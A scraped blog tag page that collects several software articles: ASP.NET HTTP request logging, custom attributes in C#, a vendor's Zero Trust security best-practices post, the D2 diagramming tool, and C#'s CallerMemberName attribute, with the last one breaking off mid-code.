برچسب: and

  • HTTP Logging in ASP.NET: how to automatically log all incoming HTTP requests (and its downsides!)

    HTTP Logging in ASP.NET: how to automatically log all incoming HTTP requests (and its downsides!)


    Aren’t you tired of adding manual logs to your HTTP APIs to log HTTP requests and responses? By using a built-in middleware in ASP.NET, you will be able to centralize logs management and have a clear view of all the incoming HTTP requests.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Whenever we publish a service, it is important to add proper logging to the application. Logging helps us understand how the system works and behaves, and it’s a fundamental component that allows us to troubleshoot problems that occur during the actual usage of the application.

    In this blog, we have talked several times about logging. However, we mostly focused on the logs that were written manually.

    In this article, we will learn how to log incoming HTTP requests to help us understand how our APIs are being used from the outside.

    Scaffolding the empty project

    To showcase this type of logging, I created an ASP.NET API. It’s a very simple application with CRUD operations on an in-memory collection.

    [ApiController]
    [Route("[controller]")]
    public class BooksController : ControllerBase
    {
        private readonly List<Book> booksCatalogue = Enumerable.Range(1, 5).Select(index => new Book
        {
            Id = index,
            Title = $"Book with ID {index}"
        }).ToList();
    
        private readonly ILogger<BooksController> _logger;
    
        public BooksController(ILogger<BooksController> logger)
        {
            _logger = logger;
        }
    }
    

    These CRUD operations are exposed via HTTP APIs, following the usual verb-based convention.

    For example:

    [HttpGet("{id}")]
    public ActionResult<Book> GetBook([FromRoute] int id)
    {
        _logger.LogInformation("Looking if in my collection with {TotalBooksCount} books there is one with ID {SearchedId}"
                , booksCatalogue.Count, id);
    
        Book? book = booksCatalogue.SingleOrDefault(x => x.Id == id);
    
        return book switch
        {
            null => NotFound(),
            _ => Ok(book)
        };
    }
    

    As you can see, I have added some custom logs: before searching for the element with the specified ID, I also wrote a log message such as “Looking if in my collection with 5 books there is one with ID 2”.

    Where can I find the message? For the sake of this article, I decided to use Seq!

    Seq is a popular log sink (well, as you may know, my favourite one!), that is easy to install and to integrate with .NET. I’ve thoroughly explained how to use Seq in conjunction with ASP.NET in this article and in other ones.

    In short, the most important change in your application is to add Seq as the log sink, like this:

    builder.Services.AddLogging(lb => {
        lb.AddSeq();
    });
    

    Now, whenever I call the GET endpoint, I can see the related log messages appear in Seq:

    Custom log messages

    But sometimes it’s not enough. I want to see more details, and I want them to be applied everywhere!

    How to add HTTP Logging to an ASP.NET application

    HTTP Logging is a way of logging most of the details of the incoming HTTP operations, tracking both the requests and the responses.

    With HTTP Logging, you don’t need to manually write custom logs to access the details of incoming requests: you just need to add its related middleware, configure it as you want, and have all the required logs available for all your endpoints.

    Adding it is pretty straightforward: you first need to add the HttpLogging middleware to the list of services:

    builder.Services.AddHttpLogging(lb => { });
    

    so that you can use it once the WebApplication instance is built:

    There’s still a problem, though: all the logs generated via HttpLogging are, by default, ignored, as logs coming from their namespace (named Microsoft.AspNetCore.HttpLogging.HttpLoggingMiddleware) are at Information log level, thus ignored because of the default configurations.

    You either have to update the appsetting.json file to tell the logging system to process logs from that namespace:

    {
      "Logging": {
        "LogLevel": {
          "Default": "Information",
          "Microsoft.AspNetCore": "Warning",
          "Microsoft.AspNetCore.HttpLogging.HttpLoggingMiddleware": "Information"
        }
      }
    }
    

    or, alternatively, you need to do the same when setting up the logging system in the Program class:

    builder.Services.AddLogging(lb => {
      lb.AddSeq();
    + lb.AddFilter("Microsoft.AspNetCore.HttpLogging.HttpLoggingMiddleware", LogLevel.Information);
    });
    

    We then have all our pieces in place: let’s execute the application!

    First, you can spin up the API; you should be able to see the Swagger page:

    Swagger page for our application&rsquo;s API

    From here, you can call the GET endpoint:

    Http response of the API call, as seen on Swagger

    You should now able to see all the logs in Seq:

    Logs list in Seq

    As you can see from the screenshot above, I have a log entry for the request and one for the response. Also, of course, I have the custom message I added manually in the C# method.

    Understanding HTTP Request logs

    Let’s focus on the data logged for the HTTP request.

    If we open the log related to the HTTP request, we can see all these values:

    Details of the HTTP Request

    Among these details, we can see properties such as:

    • the host name (localhost:7164)
    • the method (GET)
    • the path (/books/4)

    and much more.

    You can see all the properties as standalone items, but you can also have a grouped view of all the properties by accessing the HttpLog element:

    Details of the HTTP Log element

    Notice that for some elements we do not have access to the actual value, as the value is set to [Redacted]. This is a default configuration that prevents logging too many things (and undisclosing some values) as well as writing too much content on the log sink (the more you write, the less performant the queries become – and you also pay more!).

    Among other redacted values, you can see that even the Cookie value is not directly available – for the same reasons explained before.

    Understanding HTTP Response logs

    Of course, we can see some interesting data in the Response log:

    Details of the HTTP Response

    Here, among some other properties such as the Host Name, we can see the Status Code and the Trace Id (which, as you may notice, is the same as the one in te Request).

    As you can see, the log item does not contain the body of the response.

    Also, just as it happens with the Request, we do not have access to the list of HTTP Headers.

    How to save space, storage, and money by combining log entries

    For every HTTP operation, we end up with 2 log entries: one for the Request and one for the Response.

    However, it would be more practical to have both request and response info stored in the same log item so we can understand more easily what is happening.

    Lucky for us, this functionality is already in place. We just need to set the CombineLogs property to true when we add the HttpLogging functionality:

    builder.Services.AddHttpLogging(lb =>
    {
    +  lb.CombineLogs = true;
    }
    );
    

    Then, we are able to see the data for both the request and the related response in the same log element.

    Request and Response combined logs

    The downsides of using HTTP Logging

    Even though everything looks nice and pretty, adding HTTP Logging has some serious consequences.

    First of all, remember that you are doing some more operations for every incoming HTTP request. Just processing and storing the log messages can bring to an application performance downgrade – you are using parts of the processing resources to interpret the HTTP context, create the correct log entry, and store it.

    Depending on how your APIs are structured, you may need to strip out sensitive data: HTTP Logs, by default, log almost everything (except for the parts stored as Redacted). Since you don’t want to store as plain text the content of the requests, you may need to create custom logic to redact parts of the request and response you want to hide: you may need to implement a custom IHttpLoggingInterceptor.

    Finally, consider that logging occupies storage, and storage has a cost. The more you log, the higher the cost. You should define proper strategies to avoid excessive storage costs while keeping valuable logs.

    Further readings

    There is a lot more, as always. In this article, I focused on the most essential parts, but the road to having proper HTTP Logs is still long.

    You may want to start from the official documentation, of course!

    🔗 HTTP logging in ASP.NET Core | Microsoft Docs

    This article first appeared on Code4IT 🐧

    All the logs produced for this article were stored on Seq. You can find more info about installing and integrating Seq in ASP.NET Core in this article:

    🔗 Easy logging management with Seq and ILogger in ASP.NET | Code4IT

    Wrapping up

    HTTP Logging can be a good tool for understanding the application behaviour and detecting anomalies. However, as you can see, there are some important downsides that need to be considered.

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn or Twitter! 🤜🤛

    Happy coding!

    🐧





    Source link

  • How to create Custom Attributes, and why they are useful &vert; Code4IT

    How to create Custom Attributes, and why they are useful | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    In C#, attributes are used to describe the meaning of some elements, such as classes, methods, and interfaces.

    I’m sure you’ve already used them before. Examples are:

    • the [Required] attribute when you define the properties of a model to be validated;
    • the [Test] attribute when creating Unit Tests using NUnit;
    • the [Get] and the [FromBody] attributes used to define API endpoints.

    As you can see, all the attributes do not specify the behaviour, but rather, they express the meaning of a specific element.

    In this article, we will learn how to create custom attributes in C# and some possible interesting usages of such custom attributes.

    Create a custom attribute by inheriting from System.Attribute

    Creating a custom attribute is pretty straightforward: you just need to create a class that inherits from System.Attribute.

    [AttributeUsage(AttributeTargets.Interface | AttributeTargets.Class | AttributeTargets.Method, AllowMultiple = true)]
    public class ApplicationModuleAttribute : Attribute
    {
     public Module BelongingModule { get; }
    
     public ApplicationModuleAttribute(Module belongingModule)
       {
     BelongingModule = belongingModule;
       }
    }
    
    public enum Module
    {
     Authentication,
     Catalogue,
     Cart,
     Payment
    }
    

    Ideally, the class name should end with the suffix -Attribute: in this way, you can use the attribute using the short form [ApplicationModule] rather than using the whole class name, like [ApplicationModuleAttribute]. In fact, C# attributes can be resolved by convention.

    Depending on the expected usage, a custom attribute can have one or more constructors and can expose one or more properties. In this example, I created a constructor that accepts an enum.
    I can then use this attribute by calling [ApplicationModule(Module.Cart)].

    Define where a Custom Attribute can be applied

    Have a look at the attribute applied to the class definition:

    [AttributeUsage(AttributeTargets.Interface | AttributeTargets.Class | AttributeTargets.Method, AllowMultiple = true)]
    

    This attribute tells us that the ApplicationModule can be applied to interfaces, classes, and methods.

    System.AttributeTargets is an enum that enlists all the points you can attach to an attribute. The AttributeTargets enum is defined as:

    [Flags]
    public enum AttributeTargets
    {
     Assembly = 1,
     Module = 2,
     Class = 4,
     Struct = 8,
     Enum = 16,
     Constructor = 32,
     Method = 64,
     Property = 128,
     Field = 256,
     Event = 512,
     Interface = 1024,
     Parameter = 2048,
     Delegate = 4096,
     ReturnValue = 8192,
     GenericParameter = 16384,
     All = 32767
    }
    

    Have you noticed it? It’s actually a Flagged enum, whose values are powers of 2: this trick allows us to join two or more values using the OR operator.

    There’s another property to notice: AllowMultiple. When set to true, this property tells us that it’s possible to use apply more than one attribute of the same type to the same element, like this:

    [ApplicationModule(Module.Cart)]
    [ApplicationModule(Module.Catalogue)]
    public class ItemDetailsService { }
    

    Or, if you want, you can inline them:

    [ApplicationModule(Module.Cart), ApplicationModule(Module.Catalogue)]
    public class ItemDetailsService { }
    

    Practical usage of Custom Attributes

    You can use custom attributes to declare which components or business areas an element belongs to.

    In the previous example, I defined an enum that enlists all the business modules supported by my application:

    public enum Module
    {
        Authentication,
        Catalogue,
        Cart,
        Payment
    }
    

    This way, whenever I define an interface, I can explicitly tell which components it belongs to:

    [ApplicationModule(Module.Catalogue)]
    public interface IItemDetails
    {
        [ApplicationModule(Module.Catalogue)]
        string ShowItemDetails(string itemId);
    }
    
    [ApplicationModule(Module.Cart)]
    public interface IItemDiscounts
    {
        [ApplicationModule(Module.Cart)]
        bool CanHaveDiscounts(string itemId);
    }
    

    Not only that: I can have one single class implement both interfaces and mark it as related to both the Catalogue and the Cart areas.

    [ApplicationModule(Module.Cart)]
    [ApplicationModule(Module.Catalogue)]
    public class ItemDetailsService : IItemDetails, IItemDiscounts
    {
        [ApplicationModule(Module.Catalogue)]
        public string ShowItemDetails(string itemId) => throw new NotImplementedException();
    
        [ApplicationModule(Module.Cart)]
        public bool CanHaveDiscounts(string itemId) => throw new NotImplementedException();
    }
    

    Notice that I also explicitly enriched the two inner methods with the related attribute – even if it’s not necessary.

    Further readings

    As you noticed, the AttributeTargets is a Flagged Enum. Don’t you know what they are and how to define them? I’ve got you covered! I wrote two articles about Enums, and you can find info about Flagged Enums in both articles:

    🔗 5 things you should know about enums in C# | Code4IT

    and
    🔗 5 more things you should know about enums in C# | Code4IT

    This article first appeared on Code4IT 🐧

    There are some famous but not-so-obvious examples of attributes that you should know: DebuggerDisplay and InternalsVisibleTo.

    DebuggerDisplay can be useful for improving your debugging sessions.

    🔗 Simplify debugging with DebuggerDisplay attribute dotNET | Code4IT

    IntenalsVisibleTo can be used to give access to internal classes to external projects:;for example, you can use that attribute when writing unit tests.

    🔗 Testing internal members with InternalsVisibleTo | Code4IT

    Wrapping up

    In this article, I showed you how to create custom attributes in C# to specify which modules a class or a method belongs to. This trick can be useful if you want to speed up the analysis of your repository: if you need to retrieve all the classes that are used for the Cart module (for example, because you want to move them to an external library), you can just search for Module.Cart across the repository and have a full list of elements.

    In particular, this approach can be useful for the exposed components, such as API controllers. Knowing that two or more modules use the same Controller can help you understand if a change in the API structure is necessary.

    Another good usage of this attribute is automatic documentation: you could create a tool that automatically enlists all the interfaces, API endpoints, and classes grouped by the belonging module. The possibilities are infinite!

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Zero Trust Best Practices for Enterprises and Businesses


    Cybersecurity threats are becoming more sophisticated and frequent in today’s digital landscape. Whether a large enterprise or a growing small business, organizations must pivot from traditional perimeter-based security models to a more modern, robust approach—Zero Trust Security. At its core, Zero Trust operates on a simple yet powerful principle: never trust, always verify.

    Implementing Zero Trust is not a one-size-fits-all approach. It requires careful planning, integration of the right technologies, and ongoing management. Here are some key zero trust best practices to help both enterprises and small businesses establish a strong zero-trust foundation:

    1. Leverage IAM and AD Integrations

    A successful Zero-Trust strategy begins with Identity and Access Management (IAM). Integrating IAM solutions with Active Directory (AD) or other identity providers helps centralize user authentication and enforce policies more effectively. These integrations allow for a unified view of user roles, permissions, and access patterns, essential for controlling who gets access to what and when.

    IAM and AD integrations also enable seamless single sign-on (SSO) capabilities, improving user experience while ensuring access control policies are consistently applied across your environment.

    If your organization does not have an IdP or AD, choose a ZT solution with a User Management feature for Local Users.

    1. Ensure Zero Trust for Both On-Prem and Remote Users

    Gone are the days when security could rely solely on protecting the corporate network perimeter. With the rise of hybrid work models, extending zero-trust principles beyond traditional office setups is critical. This means ensuring that both on-premises and remote users are subject to the same authentication, authorization, and continuous monitoring processes.

    Cloud-native Zero Trust Network Access (ZTNA) solutions help enforce consistent policies across all users, regardless of location or device. This is especially important for businesses with distributed teams or those who rely on contractors and third-party vendors.

    1. Implement MFA for All Users for Enhanced Security

    Multi-factor authentication (MFA) is one of the most effective ways to protect user identities and prevent unauthorized access. By requiring at least two forms of verification, such as a password and a one-time code sent to a mobile device, MFA dramatically reduces the risk of credential theft and phishing attacks.

    MFA should be mandatory for all users, including privileged administrators and third-party collaborators. It’s a low-hanging fruit that can yield high-security dividends for organizations of all sizes.

    1. Ensure Proper Device Posture Rules

    Zero Trust doesn’t stop at verifying users—it must also verify their devices’ health and security posture. Whether it’s a company-issued laptop or a personal mobile phone, devices should meet specific security criteria before being granted access to corporate resources.

    This includes checking for up-to-date antivirus software, secure OS configurations, and encryption settings. By enforcing device posture rules, businesses can reduce the attack surface and prevent compromised endpoints from becoming a gateway to sensitive data.

    1. Adopt Role-Based Access Control

    Access should always be granted on a need-to-know basis. Implementing Role-Based Access Control (RBAC) ensures that users only have access to the data and applications required to perform their job functions, nothing more, nothing less.

    This minimizes the risk of internal threats and lateral movement within the network in case of a breach. For small businesses, RBAC also helps simplify user management and audit processes, primarily when roles are clearly defined, and policies are enforced consistently.

    1. Regularly Review and Update Policies

    Zero Trust is not a one-time setup, it’s a continuous process. As businesses evolve, so do user roles, devices, applications, and threat landscapes. That’s why it’s essential to review and update your security policies regularly.

    Conduct periodic audits to identify outdated permissions, inactive accounts, and policy misconfigurations. Use analytics and monitoring tools to assess real-time risk levels and fine-tune access controls accordingly. This iterative approach ensures that your Zero Trust architecture remains agile and responsive to emerging threats.

    Final Thoughts

    Zero Trust is more than just a buzzword, it’s a strategic shift that aligns security with modern business realities. Adopting these zero trust best practices can help you build a more resilient and secure IT environment, whether you are a large enterprise or a small business.

    By focusing on identity, device security, access control, and continuous policy refinement, organizations can reduce risk exposure and stay ahead of today’s ever-evolving cyber threats.

    Ready to take the next step in your Zero Trust journey? Start with what you have, plan for what you need, and adopt a security-first mindset across your organization.

    Embrace the Seqrite Zero Trust Access Solution and create a secure and resilient environment for your organization’s digital assets. Contact us today.

     



    Source link

  • like Mermaid, but better. Syntax, installation, and practical usage tips &vert; Code4IT

    like Mermaid, but better. Syntax, installation, and practical usage tips | Code4IT


    D2 is an open-source tool to design architectural layouts using a declarative syntax. It’s a textual format, which can also be stored under source control. Let’s see how it works, how you can install it, and some practical usage tips.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When defining the architecture of a system, I believe in the adage that says that «A picture is worth a thousand words».

    Proper diagramming helps in understanding how the architecture is structured, the dependencies between components, how the different components communicate, and their responsibilities.

    A clear architectural diagram can also be useful for planning. Once you have a general idea of the components, you can structure the planning according to the module dependencies and the priorities.

    A lack of diagramming leads to a “just words” definition: how many times have you heard people talk about modules that do not exist or do not work as they were imagining?

    The whole team can benefit from having a common language: a clear diagram brings clear thoughts, helping all the stakeholders (developers, architects, managers) understand the parts that compose a system.

    I tried several approaches: both online WYSIWYG tools like Draw.IO and DSL like Structurizr and Mermaid. For different reasons, I wasn’t happy with any of them.

    Then I stumbled upon D2: its rich set of elements makes it my new go-to tool for describing architectures. Let’s see how it works!

    A quick guide to D2 syntax

    Just like the more famous Mermaid, when using D2, you have to declare all the elements and connections as textual nodes.

    You can generate diagrams online by using the Playground section available on the official website, or you can install it locally (as you will see later).

    Elements: the basic components of every diagram

    Elements are defined as a set of names that can be enriched with a label and other metadata.

    Here’s an example of the most straightforward configurations for standalone elements.

    service
    
    user: Application User
    
    job: {
      shape: hexagon
    }
    

    For each element, you can define its internal name (service), a label (user: Application User) and a shape (shape: hexagon).

    A simple diagram with only two unrelated elements

    Other than that, I love the fact that you can define elements to be displayed as multiple instances: this can be useful when a service has multiple instances of the same type, and you want to express it clearly without the need to manually create multiple elements.

    You can do it by setting the multiple property to true.

    apiGtw: API Gateway {
      shape: cloud
    }
    be: BackEnd {
      style.multiple: true
    }
    
    apiGtw -> be
    

    Simple diagram with multiple backends

    Grouping: nesting elements hierarchically

    You may want to group elements. You can do that by using a hierarchical structure.

    In the following example, the main container represents my e-commerce application, composed of a website and a background job. The website is composed of a frontend, a backend, and a database.

    ecommerce: E-commerce {
      website: User Website {
        frontend
        backend
        database: DB {
          shape: cylinder
        }
      }
    
      job: {
        shape: hexagon
      }
    }
    

    As you can see from the diagram definition, elements can be nested in a hierarchical structure using the {} symbols. Of course, you can still define styles and labels to nested elements.

    Diagram with nested elements

    Connections: making elements communicate

    An architectural diagram is helpful only if it can express connections between elements.

    To connect two elements, you must use the --, the -> or the <- connector. You have to link their IDs, not their labels.

    ecommerce: E-commerce {
        website: User Website {
            frontend
        backend
        database: DB {
            shape: cylinder
        }
        frontend -> backend
        backend -> database: retrieve records {
            style.stroke: red
        }
      }
    
      job: {
          shape: hexagon
      }
      job -> website.database: update records
    }
    

    The previous example contains some interesting points.

    • Elements within the same container can be referenced directly using their ID: frontend -> backend.
    • You can add labels to a connection: backend -> database: retrieve records.
    • You can apply styles to a connection, like choosing the arrow colour with style.stroke: red.
    • You can create connections between elements from different containers: job -> website.database.

    Connections between elements from different containers

    When referencing items from different containers, you must always include the container ID: job -> website.database works, but job -> database doesn’t because database is not defined (so it gets created from scratch).

    SQL Tables: represent the table schema

    An interesting part of D2 diagrams is the possibility of adding the description of SQL tables.

    Obviously, the structure cannot be validated: the actual syntax depends on the database vendor.

    However, having the table schema defined in the diagram can be helpful in reasoning around the dependencies needed to complete a development.

    serv: Products Service
    
    db: Database Schema {
      direction: right
      shape: cylinder
      userTable: dbo.user {
        shape: sql_table
        Id: int {constraint: primary_key}
        FirstName: text
        LastName: text
        Birthday: datetime2
      }
    
      productsTable: dbo.products {
        shape: sql_table
        Id: int {constraint: primary_key}
        Owner: int {constraint: foreign_key}
        Description: text
      }
    
      productsTable.Owner -> userTable.Id
    }
    
    serv -> db.productsTable: Retrieve products by user id
    

    Diagram with database tables

    Notice how you can also define constraints to an element, like {constraint: foreign_key}, and specify the references from one table to another.

    How to install and run D2 locally

    D2 is a tool written in Go.

    Go is not natively present in every computer, so you have to install it. You can learn how to install it from the official page.

    Once Go is ready, you can install D2 in several ways. I use Windows 11, so my preferred installation approach is to use a .msi installer, as described here.

    If you are on macOS, you can use Homebrew to install it by running:

    Regardless of the Operating System, you can have Go directly install D2 by running the following command:

    go install oss.terrastruct.com/d2@latest
    

    It’s even possible to install it via Docker. However, this approach is quite complex, so I prefer installing D2 directly with the other methods I explained before.

    You can find more information about the several installation approaches on the GitHub page of the project.

    Use D2 via command line

    To work with D2 diagrams, you need to create a file with the .d2 extension. That file will contain the textual representation of the diagrams, following the syntax we saw before.

    Once D2 is installed and the file is present in the file system (in my case, I named the file my-diagram.d2), you can use the console to generate the diagram locally – remember, I’m using Windows11, so I need to run the exe file:

    d2.exe --watch .\my-diagram.d2
    

    Now you can open your browser, head to the localhost page displayed on the shell, and see how D2 renders the local file. Thanks to the --watch flag, you can update the file locally and see the result appear on the browser without the need to restart the application.

    When the diagram is ready, you can export it as a PNG or SVG by running

    d2.exe .\my-diagram.d2 my-wonderful-design.png
    

    Create D2 Diagrams on Visual Studio Code

    Another approach is to install the D2 extension on VS Code.

    D2 extension on Visual Studio Code

    Thanks to this extension, you can open any D2 file and, by using the command palette, see a preview of the final result. You can also format the document to have the diagram definition tidy and well-structured.

    D2 extension command palette

    How to install and use D2 Diagrams on Obsidian

    Lastly, D2 can be easily integrated with tools like Obsidian. Among the community plugins, you can find the official D2 plugin.

    D2 plugin for Obsidian

    As you can imagine, Go is required on your machine.
    And, if necessary, you are required to explicitly set the path to the bin folder of Go. In my case, I had to set it to C:\Users\BelloneDavide\go\bin\.

    D2 plugin settings for Obsidian

    To insert a D2 diagram in a note generated with Obsidian, you have to use d2 as a code fence language.

    Practical tips for using D2

    D2 is easy to use once you have a basic understanding of how to create elements and connections.

    However, some tips may be useful to ease the process of creating the diagrams. Or, at least, these tips helped me write and maintain my diagrams.

    Separate elements and connections definition

    A good approach is to declare the application’s structure first, and then list all the connections between elements unless the elements are within the same components and are not expected to change.

    ecommerce: E-commerce {
      website: User Website {
        backend
        database: DB {
          shape: cylinder
        }
    
        backend -> database: retrieve records {
          style.stroke: red
        }
      }
    
      job -> website.database: update records
    }
    

    Here, the connection between backend and database is internal to the website element, so it makes sense to declare it directly within the website element.

    However, the other connection between the job and the database is cross-element. In the long run, it may bring readability problems.

    So, you could update it like this:

    ecommerce: E-commerce {
     website: User Website {
     backend
     database: DB {
     shape: cylinder
     }
    
     backend -> database: retrieve records {
     style.stroke: red
     }
     }
    
    - job -> website.database: update records
    }
    
    + ecommerce.job -> ecommerce.website.database: update records
    

    This tip can be extremely useful when you have more than one element with the same name belonging to different parents.

    Needless to say, since the order of the connection declarations does not affect the final rendering, write them in an organized way that best fits your needs. In general, I prefer creating sections (using comments to declare the area), and grouping connections by the outbound module.

    Pick a colour theme (and customize it, if you want!)

    D2 allows you to specify a theme for the diagram. There are some predefined themes (which are a set of colour palettes), each with a name and an ID.

    To use a theme, you have to specify it in the vars element on top of the diagram:

    vars: {
      d2-config: {
        theme-id: 103
      }
    }
    

    103 is the theme named “Earth tones”, using a brown-based palette that, when applied to the diagram, renders it like this.

    Diagram using the 103 colour palette

    However, if you have a preferred colour palette, you can use your own colours by overriding the default values:

    vars: {
      d2-config: {
        # Terminal theme code
        theme-id: 103
        theme-overrides: {
          B4: "#C5E1A5"
        }
      }
    }
    

    Diagram with a colour overridden

    You can read more about themes and customizations here.

    What is that B4 key overridden in the previous example? Unfortunately, I don’t know: you must try all the variables to understand how the diagram is rendered.

    Choose the right layout engine

    You can choose one of the three supported layout engines to render the elements in a different way (more info here).

    DAGRE and ELK are open source, but quite basic. TALA is more sophisticated, but it requires a paid licence.

    Here’s an example of how the same diagram is rendered using the three different engines.

    A comparison betweel DAGRE, ELK and TALA layout engines

    You can decide which engine to use by declaring it in the layout-engine element:

    vars: {
      d2-config: {
        layout-engine: tala
      }
    }
    

    Choosing the right layout engine can be beneficial because sometimes some elements are not rendered correctly: here’s a weird rendering with the DAGRE engine.

    DAGRE engine with a weird rendering

    Use variables to simplify future changes

    D2 allows you to define variables in a single place and have the same value repeated everywhere it’s needed.

    So, for example, instead of having

    mySystem: {
      reader: Magazine Reader
      writer: Magazine Writer
    }
    

    With the word “Magazine” repeated, you can move it to a variable, so that it can change in the future:

    vars: {
      entityName: Magazine
    }
    
    mySystem: {
      reader: ${entityName} Reader
      writer: ${entityName} Writer
    }
    

    If in the future you’ll have to handle not only Magazines but also other media types, you can simply replace the value of entityName in one place and have it updated all over the diagram.

    D2 vs Mermaid: a comparison

    D2 and Mermaid are similar but have some key differences.

    They both are diagram-as-a-code tools, meaning that the definition of a diagram is expressed as a text file, thus making it available under source control.

    Mermaid is already supported by many tools, like Azure DevOps wikis, GitHub pages, and so on.
    On the contrary, D2 must be installed (along with the Go language).

    Mermaid is quite a “close” system: even if it allows you to define some basic styles, it’s not that flexible.

    On the contrary, D2 allows you to choose a theme for the whole diagram, as well as choosing different layout engines.
    Also, D2 has some functionalities that are (currently) missing on Mermaid:

    Mermaid, on the contrary, allows us to define more types of diagrams: State Diagrams, Gantt, Mindmaps, and so on. Also, as we saw, it’s already supported on many platforms.

    So, my (current) choice is: use D2 for architectural diagrams, and use Mermaid for everything else.

    I haven’t tried D2 for Sequence Diagrams yet, so I won’t express an opinion on that.

    Further readings

    D2 is available online with a playground you can use to try things out in a sandboxed environment.

    🔗 D2 Playground

    All the documentation can be found on GitHub or on the official website:

    🔗 D2 documentation

    And, if you want, you can use icons to create better diagrams: D2 exposes a set of SVG icons that can be easily integrated into your diagrams. You can find them here:

    🔗 D2 predefined icons

    This article first appeared on Code4IT 🐧

    Ok, but diagrams have to live in a context. How can you create useful and maintainable documentation for your future self?

    A good way to document your architectural choices is to define ADRs (Architecture Decision Records), as explained here:

    🔗 Tracking decision with Architecture Decision Records (ADRs) | Code4IT

    And, of course, just the architectural diagram is not enough: you should also describe the dependencies, the constraints, the deployment strategies, and so on. Arc42 is a template that can guide you to proper system documentation:

    🔗 Arc42 Documentation, for a comprehensive description of your project | Code4IT

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧





    Source link

  • An In-Depth Look at CallerMemberName (and some Compile-Time trivia) &vert; Code4IT

    An In-Depth Look at CallerMemberName (and some Compile-Time trivia) | Code4IT


    Let’s dive deep into the CallerMemberName attribute and explore its usage from multiple angles. We’ll see various methods of invoking it, shedding light on how it is defined at compile time.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Method names change. And, if you are using method names in some places specifying them manually, you’ll spend a lot of time updating them.

    Luckily for us, in C#, we can use an attribute named CallerMemberName.

    This attribute can be applied to a parameter in the method signature so that its runtime value is the caller method’s name.

    public void SayMyName([CallerMemberName] string? methodName = null) =>
     Console.WriteLine($"The method name is {methodName ?? "NULL"}!");
    

    It’s important to note that the parameter must be a nullable string: this way if the caller sets its value, the actual value is set. Otherwise, the name of the caller method is used. Well, if the caller method has a name! 👀

    Getting the caller method’s name via direct execution

    The easiest example is the direct call:

    private void DirectCall()
    {
      Console.WriteLine("Direct call:");
      SayMyName();
    }
    

    Here, the method prints:

    Direct call:
    The method name is DirectCall!
    

    In fact, we are not specifying the value of the methodName parameter in the SayMyName method, so it defaults to the caller’s name: DirectCall.

    CallerMemberName when using explicit parameter name

    As we already said, we can specify the value:

    private void DirectCallWithOverriddenName()
    {
      Console.WriteLine("Direct call with overridden name:");
      SayMyName("Walter White");
    }
    

    Prints:

    Direct call with overridden name:
    The method name is Walter White!
    

    It’s important to note that the compiler sets the methodName parameter only if it is not otherwise specified.

    This means that if you call SayMyName(null), the value will be null – because you explicitly declared the value.

    private void DirectCallWithNullName()
    {
      Console.WriteLine("Direct call with null name:");
      SayMyName(null);
    }
    

    The printed text is then:

    Direct call with null name:
    The method name is NULL!
    

    CallerMemberName when the method is called via an Action

    Let’s see what happens when calling it via an Action:

    public void CallViaAction()
    {
      Console.WriteLine("Calling via Action:");
    
      Action<int> action = (_) => SayMyName();
      var singleElement = new List<int> { 1 };
      singleElement.ForEach(s => action(s));
    }
    

    This method prints this text:

    Calling via Action:
    The method name is CallViaAction!
    

    Now, things get interesting: the CallerMemberName attribute recognizes the method’s name that contains the overall expression, not just the actual caller.

    We can see that, syntactically, the caller is the ForEach method (which is a method of the List<T> class). But, in the final result, the ForEach method is ignored, as the method is actually called by the CallViaAction method.

    This can be verified by accessing the compiler-generated code, for example by using Sharplab.

    Compiled code of Action with pre-set method name

    At compile time, since no value is passed to the SayMyName method, it gets autopopulated with the parent method name. Then, the ForEach method calls SayMyName, but the methodName is already defined at compiled time.

    Lambda executions and the CallerMemberName attribute

    The same behaviour occurs when using lambdas:

    private void CallViaLambda()
    {
      Console.WriteLine("Calling via lambda expression:");
    
      void lambdaCall() => SayMyName();
      lambdaCall();
    }
    

    The final result prints out the name of the caller method.

    Calling via lambda expression:
    The method name is CallViaLambda!
    

    Again, the magic happens at compile time:

    Compiled code for a lambda expression

    The lambda is compiled into this form:

    [CompilerGenerated]
    private void <CallViaLambda>g__lambdaCall|0_0()
    {
      SayMyName("CallViaLambda");
    }
    

    Making the parent method name available.

    CallerMemberName when invoked from a Dynamic type

    What if we try to execute the SayMyName method by accessing the root class (in this case, CallerMemberNameTests) as a dynamic type?

    private void CallViaDynamicInvocation()
    {
      Console.WriteLine("Calling via dynamic invocation:");
    
      dynamic dynamicInstance = new CallerMemberNameTests(null);
      dynamicInstance.SayMyName();
    }
    

    Oddly enough, the attribute does not work as could have expected, but it prints NULL:

    Calling via dynamic invocation:
    The method name is NULL!
    

    This happens because, at compile time, there is no reference to the caller method.

    private void CallViaDynamicInvocation()
    {
      Console.WriteLine("Calling via dynamic invocation:");
      
      object arg = new C();
      if (<>o__0.<>p__0 == null)
      {
        Type typeFromHandle = typeof(C);
        CSharpArgumentInfo[] array = new CSharpArgumentInfo[1];
        array[0] = CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null);
